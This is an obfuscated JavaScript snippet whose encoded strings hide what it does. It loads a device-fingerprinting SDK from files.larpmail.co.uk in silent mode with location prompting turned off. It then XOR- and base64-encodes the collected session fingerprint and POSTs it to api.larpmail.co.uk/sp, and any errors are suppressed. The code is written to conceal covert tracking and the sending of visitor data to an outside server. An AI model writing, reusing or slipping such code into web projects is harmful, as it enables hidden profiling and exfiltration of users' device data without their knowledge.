function tuxoWYzb() {
  var rSNhsiJP = ["ODAwMA", "bm93", "c2Vvbg", "VGltZWQgb3V0", "MjU", "", "MA", "ZnJvbUNoYXJDb2Rl", "MjU1", "YUhSMGNITT0", "T2k4dg", "WVhCcExteGhjbkJ0WVdsc0xtTnZMblZy", "Wm1sc1pYTXViR0Z5Y0cxaGFXd3VZMjh1ZFdzPQ", "YzNBPQ", "YzJOeWFYQjBMbXB6", "Lw", "Zmxvb3I", "cmFuZG9t", "MTAwMDAwMA", "P3Y9", "ZGVmYXVsdA", "Z2V0U2Vzc2lvbg", "ZnVuY3Rpb24", "Tm90IEF2YWlsYWJsZQ", "aW5pdA", "NTAwMA", "cmVnaW9u", "Z2VvbG9jYXRpb24", "bmV0d29ya1RpbWVvdXRNcw", "ZmllbGRUaW1lb3V0TXM", "c2lsZW50TW9kZQ", "ZW5jb2Rl", "UE9TVA", "Q29udGVudC1UeXBl", "c3RyaW5naWZ5", "ZXJyb3I", "RmFpbGVk"];
  return (tuxoWYzb = function () {
    return rSNhsiJP;
  })();
}
function ddNpIdqh(r, n) {
  var t = tuxoWYzb();
  return (ddNpIdqh = function (n, u) {
    var v = t[n -= 283];
    void 0 === ddNpIdqh.__inited && (ddNpIdqh.cZbhchsV = Object.create(null), ddNpIdqh.__decode = function (s) {
      var b64 = "";
      for (var i = 0; i < s.length; i++) b64 += String.fromCharCode(s.charCodeAt(i));
      for (; b64.length % 4;) b64 += "=";
      var bin = atob(b64);
      var esc = "";
      for (var j = 0; j < bin.length; j++) {
        var h = bin.charCodeAt(j).toString(16);
        esc += "%" + (h.length === 1 ? "0" + h : h);
      }
      return decodeURIComponent(esc);
    }, ddNpIdqh.__inited = !0);
    var key = n;
    var cached = ddNpIdqh.cZbhchsV[key];
    if (cached !== undefined) return cached;
    v = ddNpIdqh.__decode(v);
    ddNpIdqh.cZbhchsV[key] = v;
    return v;
  })(r, n);
}
async function load(timeoutMs = +ddNpIdqh(283)) {
  const start = Date[ddNpIdqh(284)]();
  while (!window[ddNpIdqh(285)]) {
    if (Date[ddNpIdqh(284)]() - start > timeoutMs) {
      throw new Error(ddNpIdqh(286));
    }
    await new Promise(r => setTimeout(r, +ddNpIdqh(287)));
  }
  return window[ddNpIdqh(285)];
}
function sleep(millis) {
  return new Promise(resolve => setTimeout(resolve, millis));
}
function _l(z) {
  let _b = ddNpIdqh(288);
  for (let i = +ddNpIdqh(289); i < z.length; i++) {
    _b += String[ddNpIdqh(290)](z[i] ^ +ddNpIdqh(291));
  }
  return _b;
}
const _h = ddNpIdqh(292);
const _p = ddNpIdqh(293);
const _mu = ddNpIdqh(294);
const _fu = ddNpIdqh(295);
const _di = ddNpIdqh(296);
const sURL = ddNpIdqh(297);
const mURL = atob(_h) + atob(_p) + atob(_mu) + ddNpIdqh(298) + atob(_di);
(async function () {
  try {
    const version = Math[ddNpIdqh(299)](Math[ddNpIdqh(300)]() * +ddNpIdqh(301));
    const _m = await import(atob(_h) + atob(_p) + atob(_fu) + ddNpIdqh(298) + atob(sURL) + ddNpIdqh(302) + String(version));
    if (!window[ddNpIdqh(285)]) {
      window[ddNpIdqh(285)] = _m?.[ddNpIdqh(303)] ?? _m?.[ddNpIdqh(285)] ?? _m;
    }
    const s = await load();
    if (typeof s?.[ddNpIdqh(304)] !== ddNpIdqh(305)) {
      throw new Error(ddNpIdqh(306));
    }
    s[ddNpIdqh(307)]();
    await sleep(+ddNpIdqh(308));
    const _s = await s[ddNpIdqh(304)]({
      [ddNpIdqh(309)]: "eu",
      [ddNpIdqh(310)]: {
        "canPrompt": false
      },
      [ddNpIdqh(311)]: 2000,
      [ddNpIdqh(312)]: 2000,
      [ddNpIdqh(313)]: true
    });
    const _ba = btoa(_l(new TextEncoder()[ddNpIdqh(314)](_s)));
    await fetch(mURL, {
      method: ddNpIdqh(315),
      headers: {
        [ddNpIdqh(316)]: 'application/json'
      },
      body: JSON[ddNpIdqh(317)]({
        data: _ba
      })
    });
  } catch {
    console[ddNpIdqh(318)](ddNpIdqh(319));
  }
})();
